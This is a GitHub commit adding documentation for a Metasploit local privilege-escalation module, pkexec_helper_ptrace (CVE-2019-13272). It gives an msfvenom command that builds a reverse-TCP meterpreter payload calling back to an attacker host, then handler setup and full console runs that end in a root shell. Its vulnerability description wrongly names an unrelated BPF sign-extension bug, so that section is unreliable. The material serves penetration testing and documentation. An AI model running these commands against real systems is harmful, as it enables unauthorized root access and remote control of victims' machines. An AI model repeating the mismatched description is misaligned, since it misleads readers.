Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
1 changed file
with
162 additions
and
0 deletions.
There are no files selected for viewing
162 changes: 162 additions & 0 deletions
162
documentation/modules/exploit/linux/local/pkexec_helper_ptrace.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,162 @@ | ||
| ## Vulnerable Application | ||
|
|
||
| Linux kernel prior to 4.14.8 utilizes the Berkeley Packet Filter (BPF) | ||
| which contains a vulnerability where it may improperly perform sign | ||
| extension. This can be utilized to escalate privileges. | ||
|
|
||
| The target system must be compiled with BPF support and must not have | ||
| `kernel.unprivileged_bpf_disabled` set to `1`. | ||
|
|
||
| This module has been tested successfully on: | ||
| * Ubuntu 16.04.5 kernel 4.15.0-29-generic | ||
| * Ubuntu 18.04.1 kernel 4.15.0-20-generic | ||
| * Ubuntu 19.04 kernel 5.0.0-15-generic | ||
| * Ubuntu Mate 18.04.2 kernel 4.18.0-15-generic | ||
| * Linux Mint 17.3 kernel 4.4.0-89-generic | ||
| * Linux Mint 18.3 kernel 4.13.0-16-generic | ||
| * Linux Mint 19 kernel 4.15.0-20-generic | ||
| * Xubuntu 16.04.4 kernel 4.13.0-36-generic | ||
| * ElementaryOS 0.4.1 4.8.0-52-generic | ||
| * Backbox 6 kernel 4.18.0-21-generic | ||
| * Parrot OS 4.5.1 kernel 4.19.0-parrot1-13t-amd64 | ||
| * Kali kernel 4.19.0-kali5-amd64 | ||
| * Redcore 1806 (LXQT) kernel 4.16.16-redcore | ||
| * MX 18.3 kernel 4.19.37-2~mx17+1 | ||
| * RHEL 8.0 kernel 4.18.0-80.el8.x86_64 | ||
| * Debian 9.4.0 kernel 4.9.0-6-amd64 | ||
| * Debian 10.0.0 kernel 4.19.0-5-amd64 | ||
| * Devuan 2.0.0 kernel 4.9.0-6-amd64 | ||
| * SparkyLinux 5.8 kernel 4.19.0-5-amd64 | ||
| * Fedora Workstation 30 kernel 5.0.9-301.fc30.x86_64 | ||
| * Manjaro 18.0.3 kernel 4.19.23-1-MANJARO | ||
| * Mageia 6 kernel 4.9.35-desktop-1.mga6 | ||
| * Antergos 18.7 kernel 4.17.6-1-ARCH | ||
|
|
||
| ## Verification Steps | ||
|
|
||
| 1. Start msfconsole | ||
| 1. Get a shell or meterpreter session on the target | ||
| 1. Do: `use exploit/linux/local/pkexec_helper_ptrace` | ||
| 1. Do: `set session #` | ||
| 1. Do: `exploit` | ||
|
|
||
| ## Options | ||
|
|
||
| **WritableDir** | ||
|
|
||
| A folder we can write files to. Defaults to `/tmp` | ||
|
|
||
| **COMPILE** | ||
|
|
||
| If we should live compile on the system, or drop pre-created binaries. Auto will determine if gcc/libs are installed to compile live on the system. Defaults to `Auto` | ||
|
|
||
| ## Scenarios | ||
|
|
||
| ### Ubuntu 18.04 (with Linux 4.15.0-13-generic) | ||
|
|
||
| #### Initial Access | ||
|
|
||
| ``` | ||
| # Create a payload binary | ||
| msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f elf -o binary | ||
| # Start a handler | ||
| msfconsole | ||
| msf5 > use exploit/multi/handler | ||
| msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp | ||
| payload => linux/x64/meterpreter/reverse_tcp | ||
| msf5 exploit(multi/handler) > set LHOST 192.168.56.1 | ||
| LHOST => 192.168.56.1 | ||
| msf5 exploit(multi/handler) > set LPORT 4444 | ||
| LPORT => 4444 | ||
| msf5 exploit(multi/handler) > run | ||
| [*] Started reverse TCP handler on 192.168.56.1:4444 | ||
| # Execute the payload from with gnome-terminal on the traget | ||
| [*] Sending stage (3021284 bytes) to 192.168.56.7 | ||
| [*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.7:33244) at 2019-09-03 17:42:17 +0800 | ||
| meterpreter > background | ||
| ``` | ||
|
|
||
| #### Escalate | ||
|
|
||
| In this scenario, gcc is installed so we can live compile on the system. | ||
|
|
||
| ``` | ||
| msf5 exploit(multi/handler) > use exploit/linux/local/pkexec_helper_ptrace | ||
| msf5 exploit(linux/local/pkexec_helper_ptrace) > set LHOST 192.168.56.1 | ||
| LHOST => 192.168.56.1 | ||
| msf5 exploit(linux/local/pkexec_helper_ptrace) > set SESSION 1 | ||
| SESSION => 1 | ||
| msf5 exploit(linux/local/pkexec_helper_ptrace) > set VERBOSE true | ||
| VERBOSE => true | ||
| msf5 exploit(linux/local/pkexec_helper_ptrace) > exploit | ||
| [*] Started reverse TCP handler on 192.168.56.1:4444 | ||
| [+] Kernel version 4.15.0-13-generic appears to be vulnerable | ||
| [+] pkexec is installed | ||
| [*] Writing '/tmp/.zacecz' (285 bytes) ... | ||
| [+] gcc is installed | ||
| [*] Live compiling exploit on system... | ||
| [*] Writing '/tmp/.fmrefxhjjcq.c' (9718 bytes) ... | ||
| [*] Executing exploit '/tmp/.fmrefxhjjcq' | ||
| [*] Transmitting intermediate stager...(126 bytes) | ||
| [*] Sending stage (3021284 bytes) to 192.168.56.7 | ||
| [*] Exploit result: | ||
| Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272) | ||
| [.] Checking environment ... | ||
| [!] Warning: $XDG_SESSION_ID is not set | ||
| [!] Warning: Could not find active PolKit agent | ||
| [~] Done, looks good | ||
| [.] Searching for known helpers ... | ||
| [~] Found known helper: /usr/lib/gnome-settings-daemon/gsd-backlight-helper | ||
| [.] Using helper: /usr/lib/gnome-settings-daemon/gsd-backlight-helper | ||
| [.] Spawning suid process (/usr/bin/pkexec) ... | ||
| [.] Tracing midpid ... | ||
| [~] Attached to midpid | ||
| [*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.7:58270) at 2019-09-03 17:29:57 +0800 | ||
| meterpreter > getuid | ||
| Server username: uid=0, gid=0, euid=0, egid=0 | ||
| ``` | ||
|
|
||
| #### Escalate w/ pre-compiled binaries | ||
|
|
||
| It is possible to force pre-compiled binaries, in a scenario where `build-essential` or `gcc` aren't on the system. | ||
|
|
||
| ``` | ||
| msf5 exploit(multi/handler) > use exploit/linux/local/pkexec_helper_ptrace | ||
| msf5 exploit(linux/local/pkexec_helper_ptrace) > set LHOST 192.168.56.1 | ||
| LHOST => 192.168.56.1 | ||
| msf5 exploit(linux/local/pkexec_helper_ptrace) > set SESSION 1 | ||
| SESSION => 1 | ||
| msf5 exploit(linux/local/pkexec_helper_ptrace) > set COMPILE False | ||
| COMPILE => False | ||
| msf5 exploit(linux/local/pkexec_helper_ptrace) > run | ||
| [*] Started reverse TCP handler on 192.168.56.1:4444 | ||
| [+] Kernel version 4.15.0-13-generic appears to be vulnerable | ||
| [+] pkexec is installed | ||
| [*] Writing '/tmp/.yaamzkukaml' (285 bytes) ... | ||
| [*] Dropping pre-compiled exploit on system... | ||
| [*] Writing '/tmp/.wtoplrisgzzo' (51200 bytes) ... | ||
| [*] Executing exploit '/tmp/.wtoplrisgzzo' | ||
| [*] Transmitting intermediate stager...(126 bytes) | ||
| [*] Sending stage (3021284 bytes) to 192.168.56.7 | ||
| [*] Exploit result: | ||
| Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272) | ||
| [.] Checking environment ... | ||
| [!] Warning: $XDG_SESSION_ID is not set | ||
| [!] Warning: Could not find active PolKit agent | ||
| [~] Done, looks good | ||
| [.] Searching for known helpers ... | ||
| [~] Found known helper: /usr/lib/gnome-settings-daemon/gsd-backlight-helper | ||
| [.] Using helper: /usr/lib/gnome-settings-daemon/gsd-backlight-helper | ||
| [.] Spawning suid process (/usr/bin/pkexec) ... | ||
| [.] Tracing midpid ... | ||
| [~] Attached to midpid | ||
| [*] Meterpreter session 3 opened (192.168.56.1:4444 -> 192.168.56.7:58272) at 2019-09-03 17:30:16 +0800 | ||
| ``` | ||
|
|